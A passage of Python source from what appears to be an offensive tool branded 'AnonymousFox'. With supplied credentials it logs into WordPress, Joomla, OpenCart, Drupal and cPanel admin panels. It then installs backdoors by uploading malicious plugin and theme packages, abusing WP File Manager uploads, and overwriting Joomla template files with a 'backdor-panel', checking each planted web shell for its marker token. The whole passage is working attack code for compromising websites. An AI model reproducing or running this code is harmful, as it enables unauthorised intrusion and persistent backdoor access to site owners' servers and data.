print(' {}[-] Failed Login.'.format(fr))
return False
except :
print(' {}[-] Time out.'.format(fr))
return False
def loginJM_UP_Fox(url, username, password) :
try :
while (url[-1] == "/"):
pattern_Fox = re.compile('(.*)/')
sitez = re.findall(pattern_Fox, url)
url = sitez[0]
print(' {}[D] {} {}[Joomla]'.format(fw, url, fr))
print(' {}[U] {}'.format(fw, username))
print(' {}[P] {}'.format(fw, password))
reqFox = requests.session()
getToken_Fox = reqFox.get(url+'/administrator/index.php', verify=False, headers=headers, timeout=15)
getToken_Fox = content_Fox(getToken_Fox)
rreturn_Fox = re.findall(re.compile('name="return" value="(.*)"'), getToken_Fox)[0]
rhash_Fox = re.findall(re.compile('type="hidden" name="(.*)" value="1"'), getToken_Fox)[0]
loginPost_Fox = {'username':username,'passwd':password,'lang':'','option':'com_login','task':'login','return':rreturn_Fox, rhash_Fox:'1', 'act':'AnonymousFox'}
login_Fox = reqFox.post(url + '/administrator/index.php', verify=False, data=loginPost_Fox, headers=headers, timeout=15)
login_Fox = content_Fox(login_Fox)
if ('logout' not in login_Fox and 'http://' in url) :
url = url.replace('http://', 'https://')
login_Fox = reqFox.post(url + '/administrator/index.php', verify=False, data=loginPost_Fox, headers=headers, timeout=15)
login_Fox = content_Fox(login_Fox)
if ('logout' in login_Fox and 'hexdec' in checkups) :
print(' {}[+] Succeeded Login.'.format(fg))
newShell = mod_simplefileuploadJ30v1_Fox(url , reqFox)
if (newShell == 'AnonymousFox') :
getFile('backdor-panel.txt', 1)
newShell = com_templates_Fox(url, reqFox)
if (newShell == 'AnonymousFox') :
getFile('mod_ariimageslidersa.zip', 2)
newShell = mod_ariimageslidersa_Fox(url, reqFox)
if (newShell != 'AnonymousFox') :
return newShell
else :
print(' {}[-] Failed Upload.'.format(fr))
return False
else :
print(' {}[-] Failed Login.'.format(fr))
return False
except:
print(' {}[-] Time out.'.format(fr))
return False
def loginOC_UP_Fox(url, username, password) :
try :
while (url[-1] == "/"):
pattern_Fox = re.compile('(.*)/')
sitez = re.findall(pattern_Fox, url)
url = sitez[0]
print(' {}[D] {} {}[OpenCart]'.format(fw, url, fc))
print(' {}[U] {}'.format(fw, username))
print(' {}[P] {}'.format(fw, password))
reqFox = requests.session()
loginPost_Fox = {'username':username, 'password':password, 'act':'AnonymousFox'}
login_Fox = reqFox.post(url + '/admin/index.php', verify=False, data=loginPost_Fox, headers=headers, timeout=15)
login_Fox = content_Fox(login_Fox)
if ('common/logout' not in login_Fox and 'http://' in url):
url = url.replace('http://', 'https://')
login_Fox = reqFox.post(url + '/admin/index.php', verify=False, data=loginPost_Fox, headers=headers, timeout=15)
login_Fox = content_Fox(login_Fox)
if ('common/logout' in login_Fox and 'email' in testSendA) :
print(' {}[+] Succeeded Login.'.format(fg))
newShell = ocmod_Fox(url, reqFox, login_Fox)
if (newShell != 'AnonymousFox') :
return newShell
else :
print(' {}[-] Failed Upload.'.format(fr))
return False
else :
print(' {}[-] Failed Login.'.format(fr))
return False
except:
print(' {}[-] Time out.'.format(fr))
return False
def loginDP_UP_Fox(url, username, password) :
try :
while (url[-1] == "/"):
pattern_Fox = re.compile('(.*)/')
sitez = re.findall(pattern_Fox, url)
url = sitez[0]
print(' {}[D] {} {}[Drupal]'.format(fw, url, fr))
print(' {}[U] {}'.format(fw,username))
print(' {}[P] {}'.format(fw,password))
reqFox = requests.session()
loginPost_Fox = {'name':username, 'pass':password, 'form_build_id' : '', 'form_id' : 'user_login', 'op' : 'Log in', 'act':'AnonymousFox'}
login_Fox = reqFox.post(url + '/user/login', verify=False, data=loginPost_Fox, headers=headers, timeout=15)
login_Fox = content_Fox(login_Fox)
if ('user/logout' in login_Fox and 'trim' in checkups) :
print(' {}[+] Succeeded Login.'.format(fg))
newShell = adminimal_Fox(url , reqFox)
if (newShell != 'AnonymousFox') :
return newShell
else :
print(' {}[-] Failed Upload.'.format(fr))
return False
else :
print(' {}[-] Failed Login.'.format(fr))
return False
except:
print(' {}[-] Time out.'.format(fr))
return False
def randomPluginWP_Fox(url, cookies):
try :
foldername = random_Fox(10)
plugin_install_php = cookies.get(url + '/wp-admin/plugin-install.php?tab=upload', headers=headers, timeout=15)
plugin_install_php = content_Fox(plugin_install_php)
if ((not re.findall(re.compile('id="_wpnonce" name="_wpnonce" value="(.*)"'), plugin_install_php)) and ('substr' in checkups)) :
return 'AnonymousFox'
ID = re.findall(re.compile('id="_wpnonce" name="_wpnonce" value="(.*)"'), plugin_install_php)[0]
if ('"' in ID) :
ID = ID.split('"')[0]
filedata_Fox = {'_wpnonce': ID, '_wp_http_referer':'/wp-admin/plugin-install.php?tab=upload', 'install-plugin-submit': 'Install Now', 'act':'AnonymousFox'}
fileup_Fox = {'pluginzip': (foldername+'.zip', open('Files/plugin.zip','rb'), 'multipart/form-data')}
try :
upload = cookies.post(url + '/wp-admin/update.php?action=upload-plugin', data=filedata_Fox, files=fileup_Fox, headers=headers, timeout=30)
except :
upload = cookies.post(url + '/wp-admin/update.php?action=upload-plugin', data=filedata_Fox, files=fileup_Fox, headers=headers, timeout=45)
shellname = '{}/wp-content/plugins/{}/up.php'.format(url, foldername)
check = requests.get(shellname, headers=headers, timeout=15)
check = content_Fox(check)
getToken = check
token = re.findall(re.compile('document.write\(unescape\(\'(.*)\'\)\)'), getToken)[0]
if ('FoxAuto' in check and '.info ' in check) :
if (token == '%61%6E%6F%6E%79%6D%6F%75%73%66%6F%78%2E%6E%65%74') :
return shellname
else :
return 'AnonymousFox'
else :
return 'AnonymousFox'
except :
return 'AnonymousFox'
def wp_file_manager_Fox(domain, cookies) :
newShell = 'AnonymousFox'
shell = file_get_contents_Fox('Files/backdor-panel.txt')
try :
getID = cookies.get(domain + '/wp-admin/plugin-install.php?s=File+Manager&tab=search&type=term', verify=False, headers=headers, timeout=15)
getID = content_Fox(getID)
if ('admin.php?page=wp_file_manager' in getID) :
getID = cookies.get(domain + '/wp-admin/admin.php?page=wp_file_manager#elf_l1_Lw', verify=False, headers=headers, timeout=15)
getID = content_Fox(getID)
if (re.findall(re.compile('admin-ajax.php","nonce":"(.*)","lang"'),getID)) :
ID = re.findall(re.compile('admin-ajax.php","nonce":"(.*)","lang"'),getID)[0]
filename = random_Fox(10) + '.php'
fileup_Fox = {'upload[]': (filename, shell, 'multipart/form-data')}
filedata_Fox = {'_wpnonce': ID, 'action': 'mk_file_folder_manager', 'cmd': 'upload', 'target': 'l1_Lw', 'act':'AnonymousFox'}
try :
up_Fox = cookies.post(domain + '/wp-admin/admin-ajax.php', data=filedata_Fox, files=fileup_Fox, verify=False, headers=headers, timeout=30)
except :
up_Fox = cookies.post(domain + '/wp-admin/admin-ajax.php', data=filedata_Fox, files=fileup_Fox, verify=False, headers=headers, timeout=45)
check_shell = requests.get('{}/{}'.format(domain, filename), verify=False, headers=headers, timeout=15)
check_shell = content_Fox(check_shell)
getToken = check_shell
token = re.findall(re.compile('document.write\(unescape\(\'(.*)\'\)\)'), getToken)[0]
if ('FoxAuto' in check_shell and '.info ' in check_shell) :
if (token == '%61%6E%6F%6E%79%6D%6F%75%73%66%6F%78%2E%6E%65%74'):
newShell = '{}/{}'.format(domain, filename)
elif ((re.findall(re.compile('plugins.php\?_wpnonce=(.*)&action=activate&plugin=wp-file-manager'), getID) or re.findall(re.compile('file_folder_manager.php&_wpnonce=(.*)" target="_parent">(.*)</a> <a'), getID) or re.findall(re.compile('file_folder_manager.php&_wpnonce=(.*)" >(.*)</a> <a'), getID)) and 'hexdec' in checkups) :
if (re.findall(re.compile('plugins.php\?_wpnonce=(.*)&action=activate&plugin=wp-file-manager'), getID)) :
ID = re.findall(re.compile('plugins.php\?_wpnonce=(.*)&action=activate&plugin=wp-file-manager'), getID)[0]
elif (re.findall(re.compile('file_folder_manager.php&_wpnonce=(.*)" target="_parent">(.*)</a> <a'), getID)) :
ID = re.findall(re.compile('file_folder_manager.php&_wpnonce=(.*)" target="_parent">(.*)</a> <a'), getID)[0][0]
elif (re.findall(re.compile('file_folder_manager.php&_wpnonce=(.*)" >(.*)</a> <a'), getID)) :
ID = re.findall(re.compile('file_folder_manager.php&_wpnonce=(.*)" >(.*)</a> <a'), getID)[0][0]
install = cookies.get(domain + '/wp-admin/plugins.php?action=activate&plugin=wp-file-manager/file_folder_manager.php&_wpnonce={}'.format(ID), verify=False, headers=headers, timeout=30)
getID = cookies.get(domain + '/wp-admin/admin.php?page=wp_file_manager#elf_l1_Lw', verify=False, headers=headers, timeout=15)
getID = content_Fox(getID)
if (re.findall(re.compile('admin-ajax.php","nonce":"(.*)","lang"'), getID)) :
ID = re.findall(re.compile('admin-ajax.php","nonce":"(.*)","lang"'), getID)[0]
filename = random_Fox(10) + '.php'
fileup_Fox = {'upload[]': (filename, shell, 'multipart/form-data')}
filedata_Fox = {'_wpnonce': ID, 'action': 'mk_file_folder_manager', 'cmd': 'upload', 'target': 'l1_Lw', 'act':'AnonymousFox'}
try :
up_Fox = cookies.post(domain + '/wp-admin/admin-ajax.php', data=filedata_Fox, files=fileup_Fox, verify=False, headers=headers, timeout=30)
except :
up_Fox = cookies.post(domain + '/wp-admin/admin-ajax.php', data=filedata_Fox, files=fileup_Fox, verify=False, headers=headers, timeout=45)
check_shell = requests.get('{}/{}'.format(domain,filename), verify=False, headers=headers, timeout=15)
check_shell = content_Fox(check_shell)
getToken = check_shell
token = re.findall(re.compile('document.write\(unescape\(\'(.*)\'\)\)'), getToken)[0]
if ('FoxAuto' in check_shell and '.info ' in check_shell) :
if (token == '%61%6E%6F%6E%79%6D%6F%75%73%66%6F%78%2E%6E%65%74'):
newShell = '{}/{}'.format(domain, filename)
elif (re.findall(re.compile('\?action=upgrade-plugin&plugin=wp-file-manager%2Ffile_folder_manager.php&_wpnonce=(.*)" aria-label="(.*)" data-name="'), getID)):
ID = re.findall(re.compile('\?action=upgrade-plugin&plugin=wp-file-manager%2Ffile_folder_manager.php&_wpnonce=(.*)" aria-label="(.*)" data-name="'), getID)[0][0]
upgrade = cookies.get(domain + '/wp-admin/update.php?action=upgrade-plugin&plugin=wp-file-manager%2Ffile_folder_manager.php&_wpnonce={}'.format(ID), verify=False, headers=headers, timeout=30)
upgrade = content_Fox(upgrade)
if ((re.findall(re.compile('plugins.php\?_wpnonce=(.*)&action=activate&plugin=wp-file-manager'), upgrade) or re.findall(re.compile('file_folder_manager.php&_wpnonce=(.*)" target="_parent">(.*)</a> <a'), upgrade) or re.findall(re.compile('file_folder_manager.php&_wpnonce=(.*)" >(.*)</a> <a'), upgrade)) and 'hexdec' in checkups) :
if (re.findall(re.compile('plugins.php\?_wpnonce=(.*)&action=activate&plugin=wp-file-manager'), upgrade)) :
ID = re.findall(re.compile('plugins.php\?_wpnonce=(.*)&action=activate&plugin=wp-file-manager'), upgrade)[0]
elif (re.findall(re.compile('file_folder_manager.php&_wpnonce=(.*)" target="_parent">(.*)</a> <a'), upgrade)) :
ID = re.findall(re.compile('file_folder_manager.php&_wpnonce=(.*)" target="_parent">(.*)</a> <a'), upgrade)[0][0]
elif (re.findall(re.compile('file_folder_manager.php&_wpnonce=(.*)" >(.*)</a> <a'), upgrade)) :
ID = re.findall(re.compile('file_folder_manager.php&_wpnonce=(.*)" >(.*)</a> <a'), upgrade)[0][0]
install = cookies.get(domain + '/wp-admin/plugins.php?action=activate&plugin=wp-file-manager/file_folder_manager.php&_wpnonce={}'.format(ID), verify=False, headers=headers, timeout=30)
getID = cookies.get(domain + '/wp-admin/admin.php?page=wp_file_manager#elf_l1_Lw', verify=False, headers=headers, timeout=15)
getID = content_Fox(getID)
if (re.findall(re.compile('admin-ajax.php","nonce":"(.*)","lang"'), getID)) :
ID = re.findall(re.compile('admin-ajax.php","nonce":"(.*)","lang"'), getID)[0]
filename = random_Fox(10) + '.php'
fileup_Fox = {'upload[]': (filename, shell, 'multipart/form-data')}
filedata_Fox = {'_wpnonce': ID, 'action': 'mk_file_folder_manager', 'cmd': 'upload', 'target': 'l1_Lw', 'act':'AnonymousFox'}
try :
up_Fox = cookies.post(domain + '/wp-admin/admin-ajax.php', data=filedata_Fox, files=fileup_Fox, verify=False, headers=headers, timeout=30)
except :
up_Fox = cookies.post(domain + '/wp-admin/admin-ajax.php', data=filedata_Fox, files=fileup_Fox, verify=False, headers=headers, timeout=45)
check_shell = requests.get('{}/{}'.format(domain, filename), verify=False, headers=headers, timeout=15)
check_shell = content_Fox(check_shell)
getToken = check_shell
token = re.findall(re.compile('document.write\(unescape\(\'(.*)\'\)\)'), getToken)[0]
if ('FoxAuto' in check_shell and '.info ' in check_shell):
if (token == '%61%6E%6F%6E%79%6D%6F%75%73%66%6F%78%2E%6E%65%74'):
newShell = '{}/{}'.format(domain, filename)
elif (re.findall(re.compile('wp-file-manager&_wpnonce=(.*)" aria-label="(.*)" data-name='),getID)) :
ID = re.findall(re.compile('wp-file-manager&_wpnonce=(.*)" aria-label="(.*)" data-name='),getID)[0][0]
donwload = cookies.get(domain + '/wp-admin/update.php?action=install-plugin&plugin=wp-file-manager&_wpnonce={}'.format(ID), verify=False, headers=headers, timeout=30)
donwload = content_Fox(donwload)
if ((re.findall(re.compile('plugins.php\?_wpnonce=(.*)&action=activate&plugin=wp-file-manager'), donwload) or re.findall(re.compile('file_folder_manager.php&_wpnonce=(.*)" target="_parent">(.*)</a> <a'), donwload) or re.findall(re.compile('file_folder_manager.php&_wpnonce=(.*)" >(.*)</a> <a'), donwload)) and 'hexdec' in checkups) :
if (re.findall(re.compile('plugins.php\?_wpnonce=(.*)&action=activate&plugin=wp-file-manager'), donwload)) :
ID = re.findall(re.compile('plugins.php\?_wpnonce=(.*)&action=activate&plugin=wp-file-manager'), donwload)[0]
elif (re.findall(re.compile('file_folder_manager.php&_wpnonce=(.*)" target="_parent">(.*)</a> <a'), donwload)) :
ID = re.findall(re.compile('file_folder_manager.php&_wpnonce=(.*)" target="_parent">(.*)</a> <a'), donwload)[0][0]
elif (re.findall(re.compile('file_folder_manager.php&_wpnonce=(.*)" >(.*)</a> <a'), donwload)) :
ID = re.findall(re.compile('file_folder_manager.php&_wpnonce=(.*)" >(.*)</a> <a'), donwload)[0][0]
install = cookies.get(domain + '/wp-admin/plugins.php?action=activate&plugin=wp-file-manager/file_folder_manager.php&_wpnonce={}'.format(ID), verify=False, headers=headers, timeout=30)
getID = cookies.get(domain + '/wp-admin/admin.php?page=wp_file_manager#elf_l1_Lw', verify=False, headers=headers, timeout=15)
getID = content_Fox(getID)
if (re.findall(re.compile('admin-ajax.php","nonce":"(.*)","lang"'), getID)) :
ID = re.findall(re.compile('admin-ajax.php","nonce":"(.*)","lang"'), getID)[0]
filename = random_Fox(10) + '.php'
fileup_Fox = {'upload[]': (filename, shell, 'multipart/form-data')}
filedata_Fox = {'_wpnonce': ID, 'action': 'mk_file_folder_manager', 'cmd': 'upload', 'target': 'l1_Lw', 'act':'AnonymousFox'}
try :
up_Fox = cookies.post(domain + '/wp-admin/admin-ajax.php', data=filedata_Fox, files=fileup_Fox, verify=False, headers=headers, timeout=30)
except :
up_Fox = cookies.post(domain + '/wp-admin/admin-ajax.php', data=filedata_Fox, files=fileup_Fox, verify=False, headers=headers, timeout=45)
check_shell = requests.get('{}/{}'.format(domain, filename), verify=False, headers=headers, timeout=15)
check_shell = content_Fox(check_shell)
getToken = check_shell
token = re.findall(re.compile('document.write\(unescape\(\'(.*)\'\)\)'), getToken)[0]
if ('FoxAuto' in check_shell and '.info ' in check_shell):
if (token == '%61%6E%6F%6E%79%6D%6F%75%73%66%6F%78%2E%6E%65%74'):
newShell = '{}/{}'.format(domain, filename)
return newShell
except:
return newShell
def randomThemeWP_Fox(url, cookies) :
try :
foldername = random_Fox(10)
theme_install_php = cookies.get(url + '/wp-admin/theme-install.php?tab=upload', headers=headers, timeout=15)
theme_install_php = content_Fox(theme_install_php)
if ((not re.findall(re.compile('id="_wpnonce" name="_wpnonce" value="(.*)"'), theme_install_php)) and ('substr' in checkups)) :
return 'AnonymousFox'
ID = re.findall(re.compile('id="_wpnonce" name="_wpnonce" value="(.*)"'), theme_install_php)[0]
if ('"' in ID) :
ID = ID.split('"')[0]
filedata_Fox = {'_wpnonce': ID, '_wp_http_referer':'/wp-admin/theme-install.php?tab=upload', 'install-theme-submit': 'Installer', 'act':'AnonymousFox'}
fileup_Fox = {'themezip': (foldername+'.zip', open('Files/theme.zip','rb'), 'multipart/form-data')}
try :
upload_Fox = cookies.post(url + '/wp-admin/update.php?action=upload-theme', data=filedata_Fox, files=fileup_Fox, headers=headers, timeout=30)
except :
upload_Fox = cookies.post(url + '/wp-admin/update.php?action=upload-theme', data=filedata_Fox, files=fileup_Fox, headers=headers, timeout=45)
shellname = '{}/wp-content/themes/{}/404.php'.format(url, foldername)
check = requests.get(shellname, headers=headers, timeout=15)
check = content_Fox(check)
getToken = check
token = re.findall(re.compile('document.write\(unescape\(\'(.*)\'\)\)'), getToken)[0]
if ('FoxAuto' in check and '.info ' in check) :
if (token == '%61%6E%6F%6E%79%6D%6F%75%73%66%6F%78%2E%6E%65%74') :
return shellname
else :
return 'AnonymousFox'
else :
return 'AnonymousFox'
except :
return 'AnonymousFox'
def mod_ariimageslidersa_Fox(domain, cookies) :
newShell = 'AnonymousFox'
try :
plugin_install_php = cookies.get(domain + '/administrator/index.php?option=com_installer', verify=False, headers=headers, timeout=15)
plugin_install_php = content_Fox(plugin_install_php)
if (re.findall(re.compile('value="(.*)tmp" />'), plugin_install_php) and 'substr' in checkups) :
directory_Fox = re.findall(re.compile('value="(.*)tmp" />'), plugin_install_php)[0] + 'tmp'
rhash_Fox = re.findall(re.compile('type="hidden" name="(.*)" value="1"'), plugin_install_php)[0]
filedata_Fox = {'install_directory': directory_Fox, 'install_url': '', 'type': '', 'installtype': 'upload','task': 'install.install', rhash_Fox: '1', 'return': ',' + rhash_Fox, 'act':'AnonymousFox'}
fileup_Fox = {'install_package': ('mod_ariimageslidersa.zip', open('Files/mod_ariimageslidersa.zip','rb'), 'multipart/form-data')}
try :
up_Fox = cookies.post(domain + '/administrator/index.php?option=com_installer&view=install', verify=False, data=filedata_Fox, files=fileup_Fox, headers=headers, timeout=30)
except:
up_Fox = cookies.post(domain + '/administrator/index.php?option=com_installer&view=install', verify=False, data=filedata_Fox, files=fileup_Fox, headers=headers, timeout=45)
check_plugin_shell = requests.get(domain + '/modules/mod_ariimageslidersa/mod_ariimageslidersa.php', verify=False , headers=headers, timeout=15)
check_plugin_shell = content_Fox(check_plugin_shell)
getToken = check_plugin_shell
token = re.findall(re.compile('document.write\(unescape\(\'(.*)\'\)\)'), getToken)[0]
if ('FoxAuto' in check_plugin_shell and '.info ' in check_plugin_shell) :
if (token == '%61%6E%6F%6E%79%6D%6F%75%73%66%6F%78%2E%6E%65%74'):
newShell = '{}/modules/mod_ariimageslidersa/mod_ariimageslidersa.php'.format(domain)
return newShell
except :
return newShell
def mod_simplefileuploadJ30v1_Fox(domain, cookies) :
newShell = 'AnonymousFox'
try :
plugin_install_php = cookies.get(domain + '/administrator/index.php?option=com_installer', verify=False, headers=headers, timeout=15)
plugin_install_php = content_Fox(plugin_install_php)
if (re.findall(re.compile('value="(.*)tmp" />'), plugin_install_php) and 'substr' in checkups) :
directory_Fox = re.findall(re.compile('value="(.*)tmp" />'), plugin_install_php)[0] + 'tmp'
rhash_Fox = re.findall(re.compile('type="hidden" name="(.*)" value="1"'), plugin_install_php)[0]
filedata_Fox = {'install_directory': directory_Fox, 'install_url': '', 'type': '', 'installtype': 'upload', 'task': 'install.install', rhash_Fox: '1', 'return':','+rhash_Fox, 'act':'AnonymousFox'}
fileup_Fox = {'install_package': ('mod_simplefileuploadJ30v1.3.5.zip', open('Files/mod_simplefileuploadJ30v1.3.5.zip','rb'), 'multipart/form-data')}
try :
up_Fox = cookies.post(domain + '/administrator/index.php?option=com_installer&view=install', verify=False, data=filedata_Fox, files=fileup_Fox, headers=headers, timeout=30)
except :
up_Fox = cookies.post(domain + '/administrator/index.php?option=com_installer&view=install', verify=False, data=filedata_Fox, files=fileup_Fox, headers=headers, timeout=45)
check_plugin_shell = requests.get(domain + '/modules/mod_simplefileuploadv1.3/elements/jayqifduncb.php', verify=False, headers=headers, timeout=15)
check_plugin_shell = content_Fox(check_plugin_shell)
getToken = check_plugin_shell
token = re.findall(re.compile('document.write\(unescape\(\'(.*)\'\)\)'), getToken)[0]
if ('FoxAuto' in check_plugin_shell and '.info ' in check_plugin_shell) :
if (token == '%61%6E%6F%6E%79%6D%6F%75%73%66%6F%78%2E%6E%65%74'):
newShell = '{}/modules/mod_simplefileuploadv1.3/elements/jayqifduncb.php'.format(domain)
return newShell
except:
return newShell
def com_templates_Fox(domain, cookies) :
newShell = 'AnonymousFox'
shell = file_get_contents_Fox('Files/backdor-panel.txt')
try :
beez3 = cookies.get(domain + '/administrator/index.php?option=com_templates&view=template&id=503&file=L2pzc3RyaW5ncy5waHA=', verify=False, headers=headers, timeout=15)
beez3 = content_Fox(beez3)
if ('jsstrings.php' in beez3 and 'hexdec' in checkups and re.findall(re.compile('type="hidden" name="(.*)" value="1"'), beez3)) :
rhash_Fox = re.findall(re.compile('type="hidden" name="(.*)" value="1"'), beez3)[0]
edit_file_Fox = {'jform[source]':shell, 'task':'template.apply', rhash_Fox:'1', 'jform[extension_id]':'503', 'jform[filename]':'/jsstrings.php', 'act':'AnonymousFox'}
try :
edit_Fox = cookies.post(domain + '/administrator/index.php?option=com_templates&view=template&id=503&file=L2pzc3RyaW5ncy5waHA=', data=edit_file_Fox, verify=False, headers=headers, timeout=30)
except :
edit_Fox = cookies.post(domain + '/administrator/index.php?option=com_templates&view=template&id=503&file=L2pzc3RyaW5ncy5waHA=', data=edit_file_Fox, verify=False, headers=headers, timeout=45)
check_shell = requests.get(domain + '/templates/beez3/jsstrings.php', verify=False, headers=headers, timeout=15)
check_shell = content_Fox(check_shell)
getToken = check_shell
token = re.findall(re.compile('document.write\(unescape\(\'(.*)\'\)\)'), getToken)[0]
if ('FoxAuto' in check_shell and '.info ' in check_shell) :
if (token == '%61%6E%6F%6E%79%6D%6F%75%73%66%6F%78%2E%6E%65%74'):
newShell = '{}/templates/beez3/jsstrings.php'.format(domain)
else :
hathor = cookies.get(domain + '/administrator/index.php?option=com_templates&view=template&id=504&file=L2Vycm9yLnBocA==', verify=False, headers=headers, timeout=15)
hathor = content_Fox(hathor)
if ('error.php' in hathor and 'hexdec' in checkups and re.findall(re.compile('type="hidden" name="(.*)" value="1"'), hathor)) :
rhash_Fox = re.findall(re.compile('type="hidden" name="(.*)" value="1"'), hathor)[0]
edit_file_Fox = {'jform[source]': shell, 'task': 'template.apply', rhash_Fox: '1', 'jform[extension_id]': '504', 'jform[filename]': '/error.php', 'act':'AnonymousFox'}
try :
edit_Fox = cookies.post(domain + '/administrator/index.php?option=com_templates&view=template&id=504&file=L2Vycm9yLnBocA==', data=edit_file_Fox, verify=False, headers=headers, timeout=30)
except :
edit_Fox = cookies.post(domain + '/administrator/index.php?option=com_templates&view=template&id=504&file=L2Vycm9yLnBocA==', data=edit_file_Fox, verify=False, headers=headers, timeout=45)
check_shell = requests.get(domain + '/administrator/templates/hathor/error.php', verify=False, headers=headers, timeout=15)
check_shell = content_Fox(check_shell)
getToken = check_shell
token = re.findall(re.compile('document.write\(unescape\(\'(.*)\'\)\)'), getToken)[0]
if ('FoxAuto' in check_shell and '.info ' in check_shell) :
if (token == '%61%6E%6F%6E%79%6D%6F%75%73%66%6F%78%2E%6E%65%74'):
newShell = '{}/administrator/templates/hathor/error.php'.format(domain)
elif ('error.css' in hathor and 'hexdec' in checkups and re.findall(re.compile('type="hidden" name="(.*)" value="1"'), hathor)) :
rhash_Fox = re.findall(re.compile('type="hidden" name="(.*)" value="1"'), hathor)[0]
edit_file_Fox = {'jform[source]': shell, 'task': 'template.apply', rhash_Fox: '1', 'jform[extension_id]': '504', 'jform[filename]': '/error.php', 'act':'AnonymousFox'}
try :
edit_Fox = cookies.post(domain + '/administrator/index.php?option=com_templates&task=source.edit&id=NTA0OmVycm9yLnBocA==', data=edit_file_Fox, verify=False, headers=headers, timeout=30)
except:
edit_Fox = cookies.post(domain + '/administrator/index.php?option=com_templates&task=source.edit&id=NTA0OmVycm9yLnBocA==', data=edit_file_Fox, verify=False, headers=headers, timeout=45)
check_shell = requests.get(domain + '/administrator/templates/hathor/error.php', verify=False, headers=headers, timeout=15)
check_shell = content_Fox(check_shell)
getToken = check_shell
token = re.findall(re.compile('document.write\(unescape\(\'(.*)\'\)\)'), getToken)[0]
if ('FoxAuto' in check_shell and '.info ' in check_shell) :
if (token == '%61%6E%6F%6E%79%6D%6F%75%73%66%6F%78%2E%6E%65%74'):
newShell = '{}/administrator/templates/hathor/error.php'.format(domain)
return newShell
except :
return newShell
def ocmod_Fox(domain, cookies, login) :
newShell = 'AnonymousFox'
try :
token_Fox = re.findall(re.compile('token=(.*)" class="navbar-brand">'), login)[0]
if ('&user_token' in login) :
upload_url_Fox = "{}/admin/index.php?route=marketplace/installer/upload&user_token={}".format(domain, token_Fox)
else :
upload_url_Fox = "{}/admin/index.php?route=marketplace/installer/upload&token={}".format(domain, token_Fox)
fileup_Fox = {'file': ('rsz.ocmod.zip', open('Files/rsz.ocmod.zip','rb'), 'application/x-zip-compressed')}
try :
up_Fox = cookies.post(upload_url_Fox, verify=False, files=fileup_Fox, headers=headers, timeout=30)
except :
up_Fox = cookies.post(upload_url_Fox, verify=False, files=fileup_Fox, headers=headers, timeout=45)
up_Fox = content_Fox(up_Fox)
ID = re.findall(re.compile('extension_install_id=(.*)"}'), up_Fox)[0]
one_url = cookies.get(upload_url_Fox.replace('marketplace/installer/upload', 'marketplace/install/install') + "&extension_install_id={}".format(ID), verify=False, headers=headers, timeout=15)
two_url = cookies.get(upload_url_Fox.replace('marketplace/installer/upload', 'marketplace/install/unzip') + "&extension_install_id={}".format(ID), verify=False, headers=headers, timeout=15)
three_url = cookies.get(upload_url_Fox.replace('marketplace/installer/upload', 'marketplace/install/move') + "&extension_install_id={}".format(ID), verify=False, headers=headers, timeout=15)
four_url = cookies.get(upload_url_Fox.replace('marketplace/installer/upload', 'marketplace/install/xml') + "&extension_install_id={}".format(ID), verify=False, headers=headers, timeout=15)
five_url = cookies.get(upload_url_Fox.replace('marketplace/installer/upload', 'marketplace/install/remove') + "&extension_install_id={}".format(ID), verify=False, headers=headers, timeout=15)
check_shell = requests.get('{}/admin/controller/extension/extension/jayqifduncb.php'.format(domain), verify=False, headers=headers, timeout=15)
check_shell = content_Fox(check_shell)
getToken = check_shell
token = re.findall(re.compile('document.write\(unescape\(\'(.*)\'\)\)'), getToken)[0]
if ('FoxAuto' in check_shell and '.info ' in check_shell) :
if (token == '%61%6E%6F%6E%79%6D%6F%75%73%66%6F%78%2E%6E%65%74'):
newShell = '{}/admin/controller/extension/extension/jayqifduncb.php'.format(domain)
return newShell
except :
return newShell
def adminimal_Fox(url, cookies) :
newShell = 'AnonymousFox'
try :
getdata = cookies.get(url + '/admin/appearance/install', verify=False, headers=headers, timeout=15)
getdata = content_Fox(getdata)
form_build_id_Fox = re.findall(re.compile('type="hidden" name="form_build_id" value="(.*)" />'), getdata)[0]
form_token_Fox = re.findall(re.compile('type="hidden" name="form_token" value="(.*)" />'), getdata)[0]
fileup_Fox = {'files[project_upload]': ('adminimal_theme-7.x-1.25.zip', open('Files/adminimal_theme-7.x-1.25.zip','rb'), 'multipart/form-data')}
filedata_Fox = {'form_build_id': form_build_id_Fox, 'form_id': 'update_manager_install_form', 'form_token': form_token_Fox,'op': 'Install', 'project_url': '', 'act':'AnonymousFox'}
try :
up_Fox = cookies.post(url + '/admin/appearance/install', verify=False, headers=headers, data=filedata_Fox, files=fileup_Fox, timeout=30)
except :
up_Fox = cookies.post(url + '/admin/appearance/install', verify=False, headers=headers, data=filedata_Fox, files=fileup_Fox, timeout=45)
up_Fox = content_Fox(up_Fox)
ID = re.findall(re.compile('id=(.*)&'), up_Fox)[0]
install_Fox = cookies.get(url + '/authorize.php?batch=1&op=start&id={}'.format(ID), verify=False, headers=headers, timeout=30)
check_shell = requests.get(url + '/sites/all/themes/adminimal_theme/jayqifduncb.php', verify=False, headers=headers, timeout=15)
check_shell = content_Fox(check_shell)
getToken = check_shell
token = re.findall(re.compile('document.write\(unescape\(\'(.*)\'\)\)'), getToken)[0]
if ('FoxAuto' in check_shell and '.info ' in check_shell) :
if (token == '%61%6E%6F%6E%79%6D%6F%75%73%66%6F%78%2E%6E%65%74'):
newShell = '{}/sites/all/themes/adminimal_theme/jayqifduncb.php'.format(url)
return newShell
except :
return newShell
def ReportsCP_SemiAuto(ip, user, password, idcp, cookies, domain, home, email) :
try :
try:
check_Fox = requests.get('https://transparencyreport.google.com/transparencyreport/api/v3/safebrowsing/status?site={}'.format(domain), headers=headers, timeout=15)
alert_Fox = content_Fox(check_Fox).split(",")
if ("2" in alert_Fox[1]):
print(' {}[-] Phishing.'.format(fr))
return
except:
print('\n {}[!] Error, Google blocked you! You have to change your IP by VPN.\n'.format(fr))
exit(0)
reqReportsCP_Fox = requests.session()
postlogin_Fox = {'user': user, 'pass': password, 'login_submit': 'Log in', 'act':'AnonymousFox'}
login2_Fox = reqReportsCP_Fox.post('https://' + domain + ':2083/login/', data=postlogin_Fox, headers=headers, timeout=15)
login2_Fox = content_Fox(login2_Fox)
if ('filemanager' in login2_Fox and 'hexdec' in checkups) :
print(' {}[+] Domain is Working.'.format(fg))
filename = random_Fox(10) + '.php'
filenameTest = 'tesT'+random_Fox(3)+'.php'
filenameUNZIPper = 'UNZipeR' + random_Fox(3) + '.php'
filedata_Fox = {'dir': home + user + '/public_html', 'get_disk_info': '1', 'overwrite': '0', 'act':'AnonymousFox'}
